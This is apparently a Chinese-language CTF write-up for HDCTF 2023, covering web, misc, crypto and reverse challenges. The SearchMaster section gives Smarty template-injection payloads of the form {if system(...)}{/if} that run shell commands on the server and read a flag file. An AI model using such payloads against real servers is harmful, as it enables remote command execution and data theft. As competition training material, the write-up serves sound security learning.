WEB

SearchMaster

根据提示,是模板的话很有可能是模板注入,先post一个data,1,2试试,发现返回1和2

image-20230422212029453

image-20230422212039451

下面去看是什么模板,用dirsearch扫出来个composer.json的文件,发现是smarty模板

image-20230422213006292

image-20230422213011571

下面就百度一把梭了,参考1. SSTI(模板注入)漏洞(入门篇) - bmjoker - 博客园 (cnblogs.com)

使用{if}{/if}进行注入,data={if phpinfo()}{/if}

image-20230422213216733

data={if system("ls /")}{/if}

image-20230422213245724

data={if system("cat /flag_13_searchmaster")}{/if}

image-20230422213312845

NSSCTF{bcf91779-06bb-4068-ae29-b35736ecbafe}

Welcome To HDCTF 2023

进去一看就是前端的游戏,直接看js文件

image-20230422213444355

发现下面有个可疑的seeeeeeeecret,还有alert,直接控制台运行,得到flag

image-20230422213601043

image-20230422213633251

NSSCTF{We13ome_t@_HDCTF_2o23}

MISC

hardMisc

1.图片末尾base64解密

image-20230422224325363

image-20230422224336778

HDCTF{wE1c0w3_10_HDctf_M15c}

ExtremeMisc

binwalk 一下,foremost分离出来一个压缩包

image-20230422224453314

解压得到的Dic.zip爆破密码

image-20230422224552170

得到的Reverse.piz每位反一下就是新的压缩包

image-20230422224646153

image-20230422224740581

1
2
3
s='05B430405100100090001FEBC8659F429608A1100000E71000009000000005C61696E6E2A79607B165011CE766D90A49222C95B2884874AB507D65976072DCD0476D2C2782E8ED3B258B62D3B8D0CCE032A3F86139CE16FA1BF0C1E4EB8BE8A27A9C32D9ABC34084FB8764F342FE1E58CB15695DDB0AAB69C28EFE1B08EC6512334C489E5E664FE1B57261B7AB562CC0C90B99C82ED98B5385FAD96893C79B41BA8B9AD153130D60678BB2FFF4ACE81B50B861D8E52BC446BAF9AE94D527EFCC66937EB5919D8F79B1C0220C0CF2E8C99506DD999959FAB62B4722B0C7E7D45172FA352711C7EA3B33672A04EB3B5BA84D2F44674FB7012834CAE98EE0F427EA89D42075DDC77218A54B87BB0753F4B1A698086EFCDFC85C44E8145AE6F3745E4BED20520399557BD8A992A8A61B000D3386A8A7CCABA007B3E6DE179BB0D6E21805B43040510010009000DFEBC865BFFB814259000000EB000000A0000000375636275647E2A7960766F49BD31741209075C9104C48AAF98827A3C8F67878C01CBFC0CA497BBC92B25DA3F0D65A29FD69664B1546B79F6164FB540FEB8FA622E90FC323EDE619BE5E7A4443071086D733B1E719BAE3525F1AF1C438435AF00C7B4101D84096E04D33CD2FF9F700947E84A803019313CBA4A36D14605BF6A1F3A4DB32AE3D6231A617C98645527CDBA84D965F1000B4C7DB617223BAA5A105B41020F3005100100090001FEBC8659F429608A1100000E710000090004200000000000000020000000000000005C61696E6E2A79607A0000200000000001000810000FD537375D69D100000000000000000000000000000000005B41020F300510010009000DFEBC865BFFB814259000000EB000000A00042000000000000000200000014100000375636275647E2A79607A0000200000000001000810000BF385475D69D100000000000000000000000000000000005B4506000000000200020007B000000EF1000000000'
for i in range(0,len(s),2):
    print(s[i+1:i+2]+s[i:i+1],end='')

image-20230422224824699

爆破密码

image-20230422224855883

明文攻击

image-20230422224925652

image-20230422225215378

image-20230422225249255

得到flag

HDCTF{u_a_a_master_@_c0mpRe553d_PaCKe1s}

Crypto

Normal_Rsa

出题人大意,直接给flag,附件没保存删了。。

Reverse

easy_re

winhex打开发现UPX特征,UPX Shell脱壳拖进ida看字符串得到flag

附件没保存就讲个思路

fake_game

拿到个python打包的程序,正常逆向流程,先pyinstxtractor.py解包

image-20230422220848779

找到game和struct,但是struct没有魔术头,直接到base_library.zip里面随便找个pyc的头加上就好

image-20230422221009908

image-20230422221020571

image-20230422221107959

2.uncompyle6反编译

image-20230422221308281

得到game.py

定位到flag.txt位置

image-20230422221433000

逆向逻辑就是通过解方程得到xoor,然后和flag循环异或即可

解方程用z3即可

image-20230422221554301

得到的xoor直接去异或会有错误,因为计算精准度有差一点

image-20230422221645390

把第四个调整为2361即可

image-20230422221716085

HDCTF{G0Od_pl2y3r_f0r_Pvz!!}